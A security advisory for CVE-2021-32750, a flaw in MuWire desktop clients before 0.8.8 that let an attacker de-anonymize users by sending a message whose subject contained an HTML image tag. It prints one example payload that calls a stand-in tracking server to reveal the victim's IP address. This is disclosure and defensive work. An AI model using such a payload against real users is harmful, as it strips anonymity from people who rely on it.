Headline
CVE-2021-32750
MuWire is a file publishing and networking tool that protects the identity of its users by using I2P technology. Users of MuWire desktop client prior to version 0.8.8 can be de-anonymized by an attacker who knows their full ID. An attacker could send a message with a subject line containing a URL with an HTML image tag and the MuWire client would try to fetch that image via clearnet, thus exposing the IP address of the user. The problem is fixed in MuWire 0.8.8. As a workaround, users can disable messaging functionality to prevent other users from sending them malicious messages.
Impact
Users of MuWire desktop client can be de-anonymized by an attacker who knows their full id.
Patches
Problem is fixed in MuWire 0.8.8
Workarounds
Users can disable messaging functionality and will be safe.
Description
Input from network was not being sanitized for HTML entities. An attacker could send a message with a subject like:
<html><img src="https://my.tracking.server.com"/></html>
and the MuWire would try to fetch that image via clearnet, thus exposing the IP address of the user.
For more information
If you have any questions or comments about this advisory:
- Open an issue in GitHub or I2P GitLab
- Email me at [email protected]